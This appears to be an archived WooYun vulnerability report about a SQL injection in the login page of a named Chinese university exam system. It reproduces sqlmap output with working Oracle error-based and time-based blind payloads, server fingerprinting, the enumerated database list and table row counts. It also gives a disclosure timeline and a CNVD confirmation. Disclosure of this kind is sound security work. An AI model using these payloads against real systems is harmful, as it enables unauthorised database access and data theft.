乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-22: 细节已通知厂商并且等待厂商处理中 2015-06-24: 厂商已经确认,细节仅向厂商公开 2015-07-04: 细节向核心白帽子及相关领域专家公开 2015-07-14: 细节向普通白帽子公开 2015-07-24: 细节向实习白帽子公开 2015-08-08: 细节向公众公开
登录SQL注入基于时间的盲注
注入点,POST型
http://exam.heuet.edu.cn:80/jiaowu/panduan.asp (POST)password=1&UserName=vtgnjbga
sqlmap identified the following injection points with a total of 261 HTTP(s) requests:---Parameter: password (POST) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: password=1' AND 6771=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(107)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6771=6771) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND 'Rgxm'='Rgxm&UserName=vtgnjbga Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: password=1' AND 2998=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(68)||CHR(113)||CHR(115),5) AND 'tmCZ'='tmCZ&UserName=vtgnjbga---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Oraclesqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: password (POST) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: password=1' AND 6771=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(107)||CHR(107)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6771=6771) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND 'Rgxm'='Rgxm&UserName=vtgnjbga Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: password=1' AND 2998=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(68)||CHR(113)||CHR(115),5) AND 'tmCZ'='tmCZ&UserName=vtgnjbga---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Oracleavailable databases [28]:[*] CAT[*] CIRCUL[*] CTXSYS[*] DBSNMP[*] DIST[*] DMSYS[*] ECARD[*] EXFSYS[*] HR[*] IX[*] MANAGER[*] MARK[*] MDSYS[*] MJ[*] OE[*] OLAPSYS[*] OPAC[*] ORDSYS[*] OUTLN[*] SCOTT[*] SERIES[*] SH[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
Database: ECARD+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| EXCEPTIONINFO | 270285 || READERS_COPY20141223 | 88318 || READERS_COPY20141210 | 88310 || READERS_COPY20140305 | 79658 || WORKPLACERELATION | 1716 || "PARAMETER" | 18 || READERTYPERELATION | 9 |+--------------------------------+---------+
登录处严格过滤
危害等级:高
漏洞Rank:13
确认时间:2015-06-24 15:15
CNVD确认所述情况,已经转由CNCERT下发给赛尔教育,由其后续协调网站管理单位处置。
暂无